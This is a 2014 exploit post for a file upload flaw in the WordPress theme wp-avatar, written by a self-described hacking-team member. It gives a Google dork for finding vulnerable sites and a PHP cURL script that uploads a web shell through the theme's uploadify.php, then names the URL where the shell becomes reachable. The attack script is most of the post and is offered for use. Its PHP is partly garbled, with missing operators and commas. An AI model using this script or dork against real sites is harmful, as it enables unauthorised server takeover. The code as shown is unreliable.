facebook facebook twitter rss

Wordpress Themes wp-avatar File Upload Vulnerability

Author: PooiChai , Published: 20-08-2014
Exploit Title: Wordpress Themes  wp-avatar File Upload Vulnerability

Google Dork: inurl:wp-content/themes/wp-avatar

Date: 18/08/2014

Facebook:fb.me/iloveyou7789

Author: PooiChai

#######################################################################



[+] exploit




<?php

 

$uploadfile
="nameshell.php";

$ch curl_init("http://example.com/wp-content/themes/wp-avatar/admin/uploadify/uploadify.php");

curl_setopt($chCURLOPT_POSTtrue);

curl_setopt($chCURLOPT_POSTFIELDS,

              array(
'Filedata'=>"@$uploadfile",

              
'folder'=>'/wp-content/themes/wp-avatar/admin/uploadify/'));

curl_setopt($chCURLOPT_RETURNTRANSFER1);

$postResult curl_exec($ch);

curl_close($ch);

 

  print 
"$postResult";

?>







Shell Access : http://www.exemple.com/wp-content/themes/wp-avatar/admin/uploadify/nameshell.php



#######################################################################



Gr33tz to : ./Trojanspot ./Sacker_Boy ./chliZAceh ./Rijal North Aceh ./Sijulai ./Reja-exe ./TNCA ./Poo Chai ./Mirzja ./Derry prilian ./pengemis 1337 ./Adi

And big family ACEH CYBER TEAM

Like us on Facebook :